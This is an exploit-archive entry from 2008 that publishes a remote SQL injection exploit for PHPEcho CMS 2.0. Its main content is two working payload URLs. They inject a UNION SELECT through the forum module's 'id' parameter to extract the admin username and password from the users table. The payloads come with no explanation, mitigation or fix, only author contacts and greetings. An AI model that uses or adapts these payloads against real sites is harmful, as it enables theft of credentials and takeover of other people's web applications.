[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHPEcho CMS 2.0 (id) Remote SQL Injection Vulnerability
# Published : 2008-01-17
# Author : Stack
# Previous Title : Gradman <= 0.1.3 (info.php tabla) Local File Inclusion Vulnerability
# Next Title : Mini File Host 1.2 (upload.php language) LFI Vulnerability


#########################################################################
    PHPEcho CMS Remote SQL Injection Exploit
#########################################################################
## Product:       PHPEchoCM
## License:       GPL
## For version:   2.0 
## AUTHOR : Stack-Terrorist [ v40]
## HOME : http://v4-team.com
## EMAIL: v.4@hotmail.fr & dj-moad@hotmail.fr
## download script : http://sourceforge.net/project/showfiles.php?group_id=186100

## EXPLOITS :
username :
http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20select%201,username,3,4%20from%20phpecms_users%20where%20id=1/*
password :
http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20select%201,password,3,4%20from%20phpecms_users%20where%20id=1/*

## GREETZ  : All members v4 Team & no-hack & tryag & soqor
#########################################################################
         PHPEcho CMS Remote SQL Injection Exploit
#########################################################################

# www.Syue.com [2008-01-17]